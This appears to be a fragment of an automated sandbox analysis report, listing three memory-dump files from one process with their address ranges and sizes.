                                                                                                                                      • memory/3860-46-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        32KB

                                                                                                                                      • memory/3860-52-0x00007FFA893E0000-0x00007FFA895E9000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        2.0MB

                                                                                                                                      • memory/3860-53-0x00007FFA87920000-0x00007FFA879DD000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        756KB